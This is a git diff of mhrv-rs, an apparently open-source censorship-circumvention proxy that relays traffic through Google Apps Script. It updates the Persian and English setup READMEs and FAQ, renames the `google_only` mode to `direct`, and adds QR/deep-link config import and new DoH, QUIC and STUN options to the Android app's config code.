-**دانلود:** `mhrv-rs-android-universal-v*.apk` از [صفحهٔ Releases](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/latest) (یک APK جهانی، روی اندروید ۷.۰ و بالاتر، همهٔ معماری‌ها).
+> **تستش کن:** دکمهٔ **Test** را بزن. یک درخواست از طریق رله می‌فرستد و می‌گوید کار کرد یا نه.
 
-**راهنمای کامل فارسی:** [**`docs/android.fa.md`**](docs/android.fa.md) — نصب APK، دیپلوی `Apps Script`، تست `SNI`، نصب گواهی `MITM`، رفع اشکال و محدودیت‌ها.
+### مرحلهٔ ۴ — مرورگر را روی mhrv-rs تنظیم کن
 
-راهنمای انگلیسی هم در [`docs/android.md`](docs/android.md) است.
+#### فایرفاکس (پیشنهادی — ساده‌ترین)
 
-جمع‌بندی سریع:
+۱. فایرفاکس → منوی ☰ → **Settings**
+۲. در کادر جست‌وجو "proxy" تایپ کن
+۳. زیر Network Settings روی **Settings…** کلیک کن
+۴. **Manual proxy configuration** را انتخاب کن
+۵. **HTTP Proxy:** `127.0.0.1` پورت: `8085`
+۶. ☑ **"Also use this proxy for HTTPS"** را تیک بزن
+۷. **OK**
 
-۱‏. APK را از `Releases` دانلود و نصب کنید (اگر اندروید «منبع ناشناس» گفت، در همان دیالوگ اجازه بدهید)  
-۲‏. `Apps Script` را طبق [مرحلهٔ ۱ بالا](#مرحلهٔ-۱--ساخت-اسکریپت-در-گوگل-فقط-یک-بار) دیپلوی کنید (همان `Code.gs` + `AUTH_KEY`)  
-۳‏. `/exec URL` و `auth_key` را در برنامه وارد کنید، **Auto-detect google_ip** را بزنید  
-۴‏. **Install MITM certificate** — برنامه گواهی را در `Downloads` ذخیره می‌کند و `Settings` را باز می‌کند. در `Settings` عبارت `CA certificate` را جست‌وجو و از `Downloads` نصب کنید  
-۵‏. **Start** → مجوز `VPN` را تأیید کنید → همه‌چیز کار می‌کند  
+#### کروم / Edge
 
+افزونهٔ [Proxy SwitchyOmega](https://chromewebstore.google.com/detail/proxy-switchyomega/padekgcemlokbadohgkifijomclgjgif) را نصب کن و پروکسی را روی `127.0.0.1:8085` تنظیم کن.
 
-محدودیت‌های اندروید همان محدودیت‌های دسکتاپ + دو مورد اضافه: `IPv6` از `TUN` رد نمی‌شود (فقط `IPv4` روت می‌شود) و اکثر برنامه‌های غیر مرورگری (بانکی، `Netflix`، پیام‌رسان‌ها) به `CA` کاربری اعتماد نمی‌کنند. جزئیات در [`docs/android.fa.md`](docs/android.fa.md#محدودیت‌های-شناخته‌شده).
+#### مک (سراسری)
 
-### سوالات رایج
+System Settings → Network → Wi-Fi → Details → **Proxies** → هر دو **Web Proxy (HTTP)** و **Secure Web Proxy (HTTPS)** را روشن کن، هر دو روی `127.0.0.1:8085`.
 
-**چرا باید گواهی نصب کنم؟ امن است؟**
-برنامه برای اینکه بتواند ترافیک `HTTPS` شما را باز کند و از طریق `Apps Script` رد کند، به یک گواهی محلی نیاز دارد. این گواهی **فقط روی سیستم خودتان** ساخته می‌شود و کلید خصوصی هیچ‌وقت جایی ارسال نمی‌شود. هیچ کس — حتی خود گوگل — نمی‌تواند با این گواهی به ترافیک شما دسترسی پیدا کند.
+### مرحلهٔ ۵ — امتحان کن
 
-**چطور گواهی را بعداً حذف کنم؟**
+در مرورگرت یک سایت مسدود را باز کن. باید لود شود.
 
-- **مک:** `Keychain Access` را باز کنید، در بخش `System` دنبال `mhrv-rs` بگردید و حذف کنید. سپس پوشهٔ `~/Library/Application Support/mhrv-rs/ca/` را پاک کنید
-- **ویندوز:** `certmgr.msc` را اجرا کنید → `Trusted Root Certification Authorities` → `Certificates` → دنبال `mhrv-rs` بگردید و حذف کنید
-- **لینوکس:** فایل `/usr/local/share/ca-certificates/mhrv-rs.crt` را حذف و `sudo update-ca-certificates` اجرا کنید
+اگر چیزی کار نکرد:
 
-**چند `Deployment ID` لازم دارم؟**
-یکی برای استفادهٔ عادی کافی است. سهمیهٔ روزانه `UrlFetchApp` برای حساب رایگان گوگل **۲۰٬۰۰۰ درخواست در روز** است (برای `Workspace` پولی ۱۰۰٬۰۰۰)، با محدودیت پاسخ ۵۰ مگابایت به ازای هر `fetch`. از هر حساب گوگل **فقط یک `Deployment`** بسازید — سقف ۳۰ درخواست همزمان به ازای هر حساب است، پس چند `Deployment` روی یک حساب همزمانی اضافه نمی‌کند. برای افزایش همزمانی یا سهمیهٔ روزانه، در حساب‌های گوگل دیگر `Deployment` بسازید — هر حساب سهمیهٔ ۲۰ هزار درخواستی و ۳۰ اجرای همزمان خودش را دارد. همهٔ `ID`ها را در فیلد `Apps Script ID(s)` وارد کنید — برنامه خودکار بینشان می‌چرخد. مرجع: <https://developers.google.com/apps-script/guides/services/quotas>
+- در پنجرهٔ mhrv-rs دکمهٔ **Test** را بزن — می‌گوید کجا گیر کرده
+- پنل **Recent log** پایین پنجره را نگاه کن
+- بخش [سؤالات رایج](#سؤالات-رایج) پایین را ببین
 
-**یوتوب کار می‌کند؟ ویدیو پخش می‌شود؟**
-صفحهٔ یوتوب سریع باز می‌شود (چون مستقیم از لبهٔ گوگل می‌آید). اما `chunk`های ویدیوی اصلی از `googlevideo.com` از طریق `Apps Script` می‌آیند و روزانه سهمیه دارند. برای تماشای گاه‌به‌گاه خوب است، برای ۱۰۸۰p پخش طولانی دردناک.
+---
 
-**‏`ChatGPT` یا `OpenAI` کار می‌کنند؟**
-استریم زنده (`streaming`) آن‌ها کار نمی‌کند چون از `WebSocket` استفاده می‌کنند و `Apps Script` آن را پشتیبانی نمی‌کند. تنها راه‌حل: از `xray` استفاده کنید (بخش **تلگرام و غیره** را ببینید).
+## سؤالات رایج
 
-**خطای `GLIBC_2.39 not found` در لینوکس می‌گیرم. چه کنم؟**
-از نسخهٔ `v0.7.1` به بعد این مشکل حل شده. اما اگر روی سیستم خیلی قدیمی هستید، آرشیو `mhrv-rs-linux-musl-amd64.tar.gz` را دانلود کنید — این نسخه بدون نیاز به `glibc` روی هر لینوکسی اجرا می‌شود.
+**واقعاً رایگانه؟** بله. گوگل به هر حساب روزانه ۲۰٬۰۰۰ درخواست خروجی URL در سهمیهٔ رایگان می‌دهد. برای مرور عادی یک نفر کاملاً کافی است. برای خانوادهٔ ۳-۴ نفره که از یک سرویس استفاده می‌کنند، در ۲-۳ حساب گوگل مختلف Deployment بساز و همهٔ ID‌ها را اضافه کن.
 
-**می‌توانم با `CLI` هم استفاده کنم (بدون رابط گرافیکی)؟**
-بله. فایل `config.example.json` را به `config.json` کپی کنید، مقادیر را پر کنید، و این دستورات را بزنید:
+**امنه؟** گواهی روی کامپیوتر خودت می‌ماند — کسی کلید خصوصی را ندارد. `auth_key` رمز محرمانهٔ توست. گوگل سایت‌هایی که از طریق رله باز می‌کنی را می‌بیند (چون Apps Script برای تو fetch می‌کند) — مثل هر پروکسی میزبانی‌شدهٔ دیگری. اگر این برایت قابل قبول نیست، از Full Tunnel با VPS شخصی استفاده کن — در [راهنمای کامل](docs/guide.fa.md#حالت-تونل-کامل).
 
-```bash
-./mhrv-rs                   # اجرای پروکسی
-./mhrv-rs test              # تست یک درخواست کامل
-./mhrv-rs scan-ips          # رتبه‌بندی IPهای گوگل بر اساس سرعت
-./mhrv-rs test-sni          # تست نام‌های SNI در pool
-./mhrv-rs --install-cert    # نصب مجدد گواهی
-./mhrv-rs --help
-```
+**ویدیوی یوتیوب پخش نمی‌شود.** chunkهای ویدیوی یوتیوب از `googlevideo.com` می‌آیند و Apps Script نمی‌تواند به آن برسد (گوگل اجازهٔ دسترسی Apps Script به CDN ویدیوی خودش را نمی‌دهد). صفحهٔ خود یوتیوب لود می‌شود، فقط پخش ویدیو تحت تأثیر است. راه‌حل: Full Tunnel + VPS، یا `.googlevideo.com` را به `passthrough_hosts` در کانفیگت اضافه کن (مرورگر مستقیم می‌رود اما روی ISP ایران throttle می‌خورد).
 
-**چرا گاهی جست‌وجوی گوگل بدون `JavaScript` نشان داده می‌شود؟**
-`Apps Script` مجبور است `User-Agent` درخواست‌های خود را روی `Google-Apps-Script` بگذارد. بعضی سایت‌ها این را به عنوان ربات شناسایی می‌کنند و نسخهٔ سادهٔ بدون `JavaScript` برمی‌گردانند. دامنه‌هایی که در لیست `SNI-rewrite` قرار گرفته‌اند (مثل `google.com`، `youtube.com`) از این مشکل در امان هستند چون مستقیماً از لبهٔ گوگل می‌آیند، نه از `Apps Script`.
+**ChatGPT / Claude / Grok کپچای Cloudflare نشان می‌دهد.** Cloudflare آی‌پی‌های دیتاسنتر گوگل را به‌عنوان bot شناسایی می‌کند. راه‌حل: یک **exit node** راه‌اندازی کن — یک handler کوچک TypeScript که روی یک host serverless (Deno Deploy، fly.io، VPS شخصی) deploy می‌کنی و پل می‌سازه از Apps Script به سایت Cloudflare. [`assets/exit_node/README.fa.md`](assets/exit_node/README.fa.md).
 
-**ورود به حساب گوگل با این ابزار ایمن است؟**
-توصیه می‌شود اولین بار بدون این پروکسی یا با `VPN` واقعی وارد شوید، چون گوگل ممکن است `IP` `Apps Script` را به‌عنوان «دستگاه ناشناس» ببیند و هشدار بدهد. بعد از ورود اولیه، استفاده بی‌مشکل است.
+**تلگرام پایدار نیست.** تلگرام از MTProto استفاده می‌کند که Apps Script نمی‌فهمد. روی کامپیوترت با [xray](https://github.com/XTLS/Xray-core) جفتش کن — [بخش تلگرام در راهنمای کامل](docs/guide.fa.md#تلگرام-با-xray).
 
-### محدودیت‌های شناخته‌شده
+**ISP خود `script.google.com` را مسدود کرده.** mhrv-rs یک حالت `direct` دارد که فقط از تونل بازنویسی SNI استفاده می‌کند (بدون Apps Script). یک‌بار از این حالت استفاده کن تا به `script.google.com` برسی و اسکریپت را دیپلوی کنی، بعد به حالت apps_script سوئیچ کن. [حالت direct](docs/guide.fa.md#حالت-direct).
 
-این محدودیت‌ها ذاتی روش `Apps Script` هستند، نه باگ این برنامه. نسخهٔ اصلی پایتون هم دقیقاً همین محدودیت‌ها را دارد.
+**جست‌وجوی گوگلم بدون JavaScript ظاهر می‌شود.** `User-Agent` Apps Script ثابت روی `Google-Apps-Script` است (گوگل نمی‌گذارد اسکریپت‌ها عوضش کنند)، پس بعضی سایت‌ها نسخهٔ بدون JS برمی‌گردانند. راه‌حل: دامنهٔ مورد نظر را به `hosts` اضافه کن تا از تونل بازنویسی SNI با User-Agent واقعی مرورگرت برود. `google.com`، `youtube.com`، `fonts.googleapis.com` به‌طور پیش‌فرض در این لیست‌اند.
 
-- ‏`User-Agent` همهٔ درخواست‌ها ثابت روی `Google-Apps-Script` است (گوگل اجازهٔ تغییر نمی‌دهد). بعضی سایت‌ها به‌خاطر این نسخهٔ ساده‌شدهٔ بدون `JavaScript` نشان می‌دهند  
-- پخش ویدیو سهمیه دارد و ممکن است کند باشد (سهمیهٔ `UrlFetchApp` برای حساب رایگان ۲۰٬۰۰۰ درخواست در روز است — چند ساعت یوتیوب برای بیشتر کاربران)  
-- فشرده‌سازی `Brotli` پشتیبانی نمی‌شود (فقط `gzip`)، سربار حجمی جزئی  
-- ‏`WebSocket` از `Apps Script` عبور نمی‌کند (`ChatGPT` استریم، `Discord voice`، …)  
-- سایت‌هایی که گواهی خود را `pin` کرده‌اند گواهی `MITM` برنامه را قبول نمی‌کنند (تعداد کمی‌اند)  
-- ورود دومرحله‌ای گوگل ممکن است هشدار «دستگاه ناشناس» بدهد — اولین ورود را بدون این ابزار انجام دهید  
-### امنیت
+**سؤالات بیشتر:** [FAQ کامل در راهنمای بلند](docs/guide.fa.md#سؤالات-رایج).
 
-- ریشهٔ `MITM` **فقط روی سیستم شما می‌ماند**. کلید خصوصی هیچ‌وقت از سیستمتان خارج نمی‌شود
-- `auth_key` یک رمز اختصاصی بین شما و اسکریپت شماست. کد سرور هر درخواستی را که این رمز را نداشته باشد رد می‌کند
-- ترافیک بین شما و گوگل، `TLS 1.3` استاندارد است
-- آنچه گوگل می‌بیند: آدرس `URL` و هدرهای درخواست شما (چون `Apps Script` به‌جای شما `fetch` می‌کند). این همان سطح اعتماد هر پروکسی میزبانی‌شده است — اگر قابل قبول نیست، از `VPN` روی سرور شخصی خودتان استفاده کنید
-- **هشدار افشای `IP` در حالت `apps_script`:** نسخهٔ ۱.۲.۹ همهٔ هدرهای شناسایی‌کننده (`X-Forwarded-For`، `X-Real-IP`، `Forwarded`، `Via`، `CF-Connecting-IP`، `True-Client-IP`، `Fastly-Client-IP` و ~۱۰ هدر مشابه) را از درخواست خروجی سمت کلاینت قبل از رسیدن به `Apps Script` حذف می‌کند ([#104](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/104)). اما آنچه این پوشش نمی‌دهد: هر هدری که زیرساخت خود گوگل ممکن است به درخواست بعدی `UrlFetchApp.fetch()` از کلاینت اضافه کند، در اختیار این برنامه نیست. سرور مقصد `IP` دیتاسنتر گوگل را می‌بیند، اما هیچ تعهد عمومی از گوگل وجود ندارد که `IP` واقعی کاربر در زنجیرهٔ هدرهای داخلی منتشر نمی‌شود. اگر مدل تهدید شما این است که سرور مقصد تحت هیچ شرایطی نباید `IP` شما را ببیند، **از حالت `full` (تونل کامل) استفاده کنید** (ترافیک از `VPS` شخصی شما خارج می‌شود، فقط `IP` آن `VPS` دیده می‌شود). حالت `apps_script` برای دور زدن `DPI` و دسترسی به سایت‌های فیلترشده کاملاً مناسب است، اما فرض می‌کند «دیده‌شدن توسط گوگل» قابل قبول است. مطرح‌شده در [#148](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/148).
+## کمک می‌خواهی؟
 
-### اعتبار
+- در [issueهای باز و بسته](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues?q=is%3Aissue) جست‌وجو کن — احتمالاً مشکلت قبلاً جواب داده شده
+- یک [issue جدید](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/new) باز کن با: کانفیگت (حتماً `auth_key` را پنهان کن!)، دقیقاً چه کاری کردی، دقیقاً چه دیدی در log
 
-پروژهٔ اصلی: <https://github.com/masterking32/MasterHttpRelayVPN> توسط [@masterking32](https://github.com/masterking32). ایده، پروتکل `Apps Script`، و معماری پروکسی همه متعلق به ایشان است. این پورت `Rust` فقط برای ساده‌تر کردن توزیع سمت کلاینت درست شده.
+## اعتبار
 
-### حمایت از پروژه
+پروژهٔ اصلی: **[@masterking32/MasterHttpRelayVPN](https://github.com/masterking32/MasterHttpRelayVPN)**. ایده، پروتکل Apps Script، معماری پروکسی — همه از اوست. این پورت Rust برای ساده‌تر کردن توزیع سمت کلاینت است (یک فایل اجرایی، بدون نصب پایتون).
 
-اگر `mhrv-rs` برای شما مفید بوده و می‌خواهید از ادامهٔ توسعه حمایت کنید:
+بیشتر کد Rust این پورت با کمک [Claude شرکت Anthropic](https://claude.com) نوشته شده، روی هر commit انسانی بازبینی شده.
 
-### [❤️ حمایت در sh1n.org](https://sh1n.org/donate)
+## حمایت از پروژه
 
-کمک‌ها صرف هزینه‌های میزبانی، سرور `CI` اختصاصی، و ادامهٔ نگهداری پروژه می‌شود. ستاره دادن به ریپو هم یک راه رایگان برای نشان دادن اینه که پروژه ارزش ادامه دادن داره.
+[❤️ کمک مالی در sh1n.org](https://sh1n.org/donate) — برای پوشش هزینهٔ هاستینگ و runner CI. ستاره دادن به ریپو هم نشان می‌دهد پروژه ارزش ادامه دادن دارد.
 
 </div>
diff --git a/SF_README.md b/SF_README.md
index 2648c790..a172fd8e 100644
--- a/SF_README.md
+++ b/SF_README.md
@@ -23,7 +23,7 @@ A free way to bypass internet censorship by routing your traffic through your ow
 **1. Set up the relay in your Google account (one-time).**
 Go to <https://script.google.com>, sign in, click **New project**. Delete the sample code, paste in the [Code.gs file from this repo](assets/apps_script/Code.gs), change `AUTH_KEY = "..."` to a password only you know. Click **Deploy → New deployment → Web app**, set "Execute as: Me", "Who has access: Anyone". Copy the long ID from the URL — that's your **Deployment ID**.
 
-> Can't reach `script.google.com` because it's blocked? Run mhrv-rs first in `google_only` mode (use [`config.google-only.example.json`](config.google-only.example.json)). It only relays Google sites and lets you reach the Apps Script editor through the bypass tunnel. Do step 1 in your browser, then switch back to normal mode.
+> Can't reach `script.google.com` because it's blocked? Run mhrv-rs first in `direct` mode (use [`config.direct.example.json`](config.direct.example.json)). It only relays Google sites (plus any [fronting_groups](docs/fronting-groups.md) you've configured) and lets you reach the Apps Script editor through the bypass tunnel. Do step 1 in your browser, then switch back to normal mode. (`direct` was named `google_only` before v1.9 — the old name still works.)
 
 **2. Install and run mhrv-rs.**
 Download the package for your system from [Releases](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/latest) and unzip it.
@@ -94,7 +94,7 @@ This project is free and run by volunteers. If it helped you and you can spare a
 **۱. ساخت ریله در حساب گوگل (فقط یک بار).**
 به <https://script.google.com> بروید، وارد حساب گوگل شوید و روی **New project** بزنید. کد پیش‌فرض را پاک کنید و محتوای [فایل Code.gs](assets/apps_script/Code.gs) همین مخزن را در آن جای‌گذاری کنید. خط `AUTH_KEY = "..."` را به یک رمز دلخواه که فقط خودتان می‌دانید تغییر دهید. سپس **Deploy → New deployment → Web app** را بزنید، گزینهٔ "Execute as: Me" و "Who has access: Anyone" را انتخاب کنید. آی‌دی طولانی توی URL را کپی کنید — این **Deployment ID** شماست.
 
-> اگر `script.google.com` خودش بسته است، اول mhrv-rs را در حالت `google_only` اجرا کنید (از [`config.google-only.example.json`](config.google-only.example.json) استفاده کنید). این حالت فقط سایت‌های گوگل را تونل می‌کند تا بتوانید به ویرایشگر Apps Script برسید. مرحلهٔ ۱ را در مرورگر انجام دهید و بعد به حالت معمولی برگردید.
+> اگر `script.google.com` خودش بسته است، اول mhrv-rs را در حالت `direct` اجرا کنید (از [`config.direct.example.json`](config.direct.example.json) استفاده کنید). این حالت فقط سایت‌های گوگل (به علاوهٔ هر [fronting_groups](docs/fronting-groups.md) که تنظیم کرده باشید) را تونل می‌کند تا بتوانید به ویرایشگر Apps Script برسید. مرحلهٔ ۱ را در مرورگر انجام دهید و بعد به حالت معمولی برگردید. (نام قبلی این حالت `google_only` بود — همچنان پذیرفته می‌شود.)
 
 **۲. نصب و اجرای mhrv-rs.**
 بستهٔ مخصوص سیستم خودتان را از [بخش Releases](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/latest) دانلود کنید و از حالت فشرده در بیاورید.
diff --git a/android/app/build.gradle.kts b/android/app/build.gradle.kts
index 29671b31..e7fc15ae 100644
--- a/android/app/build.gradle.kts
+++ b/android/app/build.gradle.kts
@@ -14,8 +14,8 @@ android {
         applicationId = "com.therealaleph.mhrv"
         minSdk = 24 // Android 7.0 — covers 99%+ of live devices.
         targetSdk = 34
-        versionCode = 139
-        versionName = "1.6.0"
+        versionCode = 159
+        versionName = "1.9.25"
 
         // Ship all four mainstream Android ABIs:
         //   - arm64-v8a      — 95%+ of real-world Android phones since 2019
@@ -136,6 +136,10 @@ dependencies {
     implementation("androidx.compose.material3:material3")
     implementation("androidx.compose.material:material-icons-extended")
 
+    // QR code generation + scanning (self-contained, no ML Kit needed).
+    implementation("com.google.zxing:core:3.5.3")
+    implementation("com.journeyapps:zxing-android-embedded:4.3.0")
+
     debugImplementation("androidx.compose.ui:ui-tooling")
     debugImplementation("androidx.compose.ui:ui-test-manifest")
 }
diff --git a/android/app/src/main/AndroidManifest.xml b/android/app/src/main/AndroidManifest.xml
index dd2e94e8..cce8e611 100644
--- a/android/app/src/main/AndroidManifest.xml
+++ b/android/app/src/main/AndroidManifest.xml
@@ -17,6 +17,7 @@
       prompt.
     -->
     <uses-permission android:name="android.permission.QUERY_ALL_PACKAGES" />
+    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
 
     <!--
       App-launcher visibility filter. Complements QUERY_ALL_PACKAGES:
@@ -53,8 +54,33 @@
                 <action android:name="android.intent.action.MAIN" />
                 <category android:name="android.intent.category.LAUNCHER" />
             </intent-filter>
+            <!-- Deep link: tapping mhrv://... in any app opens MainActivity
+                 and auto-imports the encoded config. -->
+            <intent-filter>
+                <action android:name="android.intent.action.VIEW" />
+                <category android:name="android.intent.category.DEFAULT" />
+                <category android:name="android.intent.category.BROWSABLE" />
+                <data android:scheme="mhrv-rs" />
+            </intent-filter>
         </activity>
 
+        <!-- FileProvider for sharing QR code images via the share sheet. -->
+        <provider
+            android:name="androidx.core.content.FileProvider"
+            android:authorities="${applicationId}.fileprovider"
+            android:exported="false"
+            android:grantUriPermissions="true">
+            <meta-data
+                android:name="android.support.FILE_PROVIDER_PATHS"
+                android:resource="@xml/file_paths" />
+        </provider>
+
+        <!-- Force ZXing scanner to portrait (matches app orientation). -->
+        <activity
+            android:name="com.journeyapps.barcodescanner.CaptureActivity"
+            android:screenOrientation="portrait"
+            tools:replace="android:screenOrientation" />
+
         <!--
           VpnService: Android captures all traffic at the IP layer and feeds
           it to us via a TUN file descriptor. The android.net.VpnService action
diff --git a/android/app/src/main/java/com/therealaleph/mhrv/ConfigStore.kt b/android/app/src/main/java/com/therealaleph/mhrv/ConfigStore.kt
index 25625ded..d00d59e4 100644
--- a/android/app/src/main/java/com/therealaleph/mhrv/ConfigStore.kt
+++ b/android/app/src/main/java/com/therealaleph/mhrv/ConfigStore.kt
@@ -64,19 +64,23 @@ enum class UiLang { AUTO, FA, EN }
  *
  * - [APPS_SCRIPT] (default) — full DPI bypass through the user's deployed
  *   Apps Script relay. Requires a Deployment ID + Auth key.
- * - [GOOGLE_ONLY] — bootstrap mode. Only the SNI-rewrite tunnel to the
- *   Google edge is active, so the user can reach `script.google.com` to
- *   deploy Code.gs in the first place. No Deployment ID / Auth key needed.
- *   Non-Google traffic goes direct (no relay).
+ * - [DIRECT] — no Apps Script relay. Only the SNI-rewrite tunnel is
+ *   active: Google edge by default, plus any user-configured
+ *   `fronting_groups` (Vercel, Fastly, …). Useful as a bootstrap to
+ *   reach `script.google.com` and deploy Code.gs, or as a standalone
+ *   mode for users who only need fronting-group targets. No Deployment
+ *   ID / Auth key needed. Non-matching traffic goes raw (no relay).
+ *   Was named `GOOGLE_ONLY` before fronting_groups was added — the
+ *   string `"google_only"` is still accepted on parse for back-compat.
  * - [FULL] — full tunnel mode. ALL traffic is tunneled end-to-end through
  *   Apps Script + a remote tunnel node. No certificate installation needed.
  */
-enum class Mode { APPS_SCRIPT, GOOGLE_ONLY, FULL }
+enum class Mode { APPS_SCRIPT, DIRECT, FULL }
 
 data class MhrvConfig(
     val mode: Mode = Mode.APPS_SCRIPT,
 
-    val listenHost: String = "127.0.0.1",
+    val listenHost: String = "0.0.0.0",
     val listenPort: Int = 8080,
     val socks5Port: Int? = 1081,
 
@@ -92,6 +96,20 @@ data class MhrvConfig(
     val verifySsl: Boolean = true,
     val logLevel: String = "info",
     val parallelRelay: Int = 1,
+    /**
+     * Disable the HTTP/2 multiplexing on the Apps Script relay leg.
+     * Default false (h2 active); flip to true to force the legacy
+     * HTTP/1.1 keep-alive pool. Round-tripped from config.json so a
+     * hand-edited kill switch survives a save round trip from the
+     * Android UI. See `src/config.rs` `force_http1`.
+     */
+    val forceHttp1: Boolean = false,
+    val coalesceStepMs: Int = 10,
+    val coalesceMaxMs: Int = 1000,
+    /** Block QUIC (UDP/443). QUIC over TCP tunnel causes meltdown. */
+    val blockQuic: Boolean = true,
+    /** Block STUN/TURN ports (3478/5349/19302). Forces WebRTC TCP fallback. */
+    val blockStun: Boolean = true,
     val upstreamSocks5: String = "",
 
     /**
@@ -104,6 +122,30 @@ data class MhrvConfig(
      */
     val passthroughHosts: List<String> = emptyList(),
 
+    /**
+     * Opt-out for the DoH bypass. The Rust default is to bypass DoH
+     * traffic (chrome.cloudflare-dns.com, dns.google, etc.) directly
+     * instead of routing it through the Apps Script tunnel — DoH
+     * already encrypts queries, so the tunnel was just adding ~2 s
+     * per name lookup with no real privacy gain. Set this to true to
+     * keep DoH inside the tunnel. See `src/config.rs` `tunnel_doh`.
+     */
+    val tunnelDoh: Boolean = true,
+
+    /**
+     * Extra hostnames added to the built-in DoH default list. Same
+     * matching shape as `passthroughHosts` (exact or leading-dot
+     * suffix). Use to cover private / enterprise DoH endpoints.
+     */
+    val bypassDohHosts: List<String> = emptyList(),
+
+    /**
+     * When true, reject all connections to known DoH endpoints.
+     * Browsers fall back to system DNS (tun2proxy virtual DNS — instant).
+     * Takes priority over tunnel_doh / bypass_doh.
+     */
+    val blockDoh: Boolean = true,
+
     /** VPN_TUN (everything routed) vs PROXY_ONLY (user configures per-app). */
     val connectionMode: ConnectionMode = ConnectionMode.VPN_TUN,
 
@@ -112,6 +154,13 @@ data class MhrvConfig(
     /** Package names used by ONLY and EXCEPT. Empty under ALL. */
     val splitApps: List<String> = emptyList(),
 
+    /**
+     * Route YouTube traffic through Apps Script relay instead of the
+     * SNI-rewrite tunnel. Avoids Google SafeSearch-on-SNI / restricted
+     * mode, but slower for video. Maps to Rust `youtube_via_relay`.
+     */
+    val youtubeViaRelay: Boolean = false,
+
     /** UI language toggle. Non-Rust; honoured only by the Android wrapper. */
     val uiLang: UiLang = UiLang.AUTO,
 ) {
@@ -158,14 +207,14 @@ data class MhrvConfig(
             // "missing field `mode`" and startProxy silently returns 0.
             put("mode", when (mode) {
                 Mode.APPS_SCRIPT -> "apps_script"
-                Mode.GOOGLE_ONLY -> "google_only"
+                Mode.DIRECT -> "direct"
                 Mode.FULL -> "full"
             })
             put("listen_host", listenHost)
             put("listen_port", listenPort)
             socks5Port?.let { put("socks5_port", it) }
 
-            // In google_only mode these are unused by the Rust side, but we
+            // In direct mode these are unused by the Rust side, but we
             // still persist whatever the user typed so flipping back to
             // apps_script mode doesn't wipe their settings.
             put("script_ids", JSONArray().apply { ids.forEach { put(it) } })
@@ -180,12 +229,31 @@ data class MhrvConfig(
             put("verify_ssl", verifySsl)
             put("log_level", logLevel)
             put("parallel_relay", parallelRelay)
+            if (forceHttp1) put("force_http1", true)
+            if (coalesceStepMs != 10) put("coalesce_step_ms", coalesceStepMs)
+            if (coalesceMaxMs != 1000) put("coalesce_max_ms", coalesceMaxMs)
+            put("block_quic", blockQuic)
+            put("block_stun", blockStun)
             if (upstreamSocks5.isNotBlank()) {
                 put("upstream_socks5", upstreamSocks5.trim())
             }
             if (passthroughHosts.isNotEmpty()) {
                 put("passthrough_hosts", JSONArray().apply { passthroughHosts.forEach { put(it) } })
             }
+            put("tunnel_doh", tunnelDoh)
+            put("block_doh", blockDoh)
+            if (youtubeViaRelay) put("youtube_via_relay", true)
+            // Trim/drop-empty/dedupe before serializing — symmetric with the
+            // read-side normalization in loadFromJson(), so a user typing
+            // " doh.foo " or accidentally adding a duplicate doesn't end up
+            // in the saved JSON.
+            val cleanBypassDohHosts = bypassDohHosts
+                .map { it.trim() }
+                .filter { it.isNotEmpty() }
+                .distinct()
+            if (cleanBypassDohHosts.isNotEmpty()) {
+                put("bypass_doh_hosts", JSONArray().apply { cleanBypassDohHosts.forEach { put(it) } })
+            }
 
             // Phone-scoped scan defaults. We don't expose these in the UI
             // because a phone isn't where you'd run a full /16 scan; users
@@ -230,59 +298,7 @@ object ConfigStore {
         val f = File(ctx.filesDir, FILE)
         if (!f.exists()) return MhrvConfig()
         return try {
-            val obj = JSONObject(f.readText())
-
-            val ids = obj.optJSONArray("script_ids")?.let { arr ->
-                buildList { for (i in 0 until arr.length()) add(arr.optString(i)) }
-            }?.filter { it.isNotBlank() }.orEmpty()
-            // For display we turn each ID back into the full URL form —
-            // easier to paste-verify, and the Kotlin side doesn't depend
-            // on it (extractId re-parses on save).
-            val urls = ids.map { "https://script.google.com/macros/s/$it/exec" }
-
-            val sni = obj.optJSONArray("sni_hosts")?.let { arr ->
-                buildList { for (i in 0 until arr.length()) add(arr.optString(i)) }
-            }?.filter { it.isNotBlank() }.orEmpty()
-
-            MhrvConfig(
-                mode = when (obj.optString("mode", "apps_script")) {
-                    "google_only" -> Mode.GOOGLE_ONLY
-                    "full" -> Mode.FULL
-                    else -> Mode.APPS_SCRIPT
-                },
-                listenHost = obj.optString("listen_host", "127.0.0.1"),
-                listenPort = obj.optInt("listen_port", 8080),
-                socks5Port = obj.optInt("socks5_port", 1081).takeIf { it > 0 },
-                appsScriptUrls = urls,
-                authKey = obj.optString("auth_key", ""),
-                frontDomain = obj.optString("front_domain", "www.google.com"),
-                sniHosts = sni,
-                googleIp = obj.optString("google_ip", "142.251.36.68"),
-                verifySsl = obj.optBoolean("verify_ssl", true),
-                logLevel = obj.optString("log_level", "info"),
-                parallelRelay = obj.optInt("parallel_relay", 1),
-                upstreamSocks5 = obj.optString("upstream_socks5", ""),
-                passthroughHosts = obj.optJSONArray("passthrough_hosts")?.let { arr ->
-                    buildList { for (i in 0 until arr.length()) add(arr.optString(i)) }
-                }?.filter { it.isNotBlank() }.orEmpty(),
-                connectionMode = when (obj.optString("connection_mode", "vpn_tun")) {
-                    "proxy_only" -> ConnectionMode.PROXY_ONLY
-                    else -> ConnectionMode.VPN_TUN  // default for unknown/missing
-                },
-                splitMode = when (obj.optString("split_mode", "all")) {
-                    "only" -> SplitMode.ONLY
-                    "except" -> SplitMode.EXCEPT
-                    else -> SplitMode.ALL
-                },
-                splitApps = obj.optJSONArray("split_apps")?.let { arr ->
-                    buildList { for (i in 0 until arr.length()) add(arr.optString(i)) }
-                }?.filter { it.isNotBlank() }.orEmpty(),
-                uiLang = when (obj.optString("ui_lang", "auto")) {
-                    "fa" -> UiLang.FA
-                    "en" -> UiLang.EN
-                    else -> UiLang.AUTO
-                },
-            )
+            loadFromJson(JSONObject(f.readText()))
         } catch (_: Throwable) {
             MhrvConfig()
         }
@@ -292,6 +308,181 @@ object ConfigStore {
         val f = File(ctx.filesDir, FILE)
         f.writeText(cfg.toJson())
     }
+
+    /** Prefix for encoded config strings so we can detect them in clipboard. */
